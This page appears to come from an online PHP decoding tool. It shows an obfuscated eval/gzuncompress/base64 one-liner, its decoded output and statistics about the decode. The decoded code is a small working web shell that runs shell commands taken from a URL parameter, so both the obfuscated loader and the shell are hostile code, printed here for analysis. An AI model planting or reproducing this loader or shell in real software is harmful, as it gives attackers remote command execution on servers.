Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzuncompress(base64_decode('eJxLTc7IV1AP8Agwd7UpKEq1U9dzKM5IzcmJT61ITdZQiXd3DYl..
Decoded Output download
echo 'PHP7E<pre>'.@shell_exec($_GET['dmc']).'</pre>';
Did this file decode correctly?
Original Code
<?php eval(gzuncompress(base64_decode('eJxLTc7IV1AP8Agwd7UpKEq1U9dzKM5IzcmJT61ITdZQiXd3DYlWT8lNVo/V1FO30QcrsQYAxhQQUg=='))); ?>
Function Calls
gzuncompress | 1 |
base64_decode | 1 |
Stats
MD5 | b41f9acd69b7980f66c7d2346a729a2b |
Eval Count | 1 |
Decode Time | 55 ms |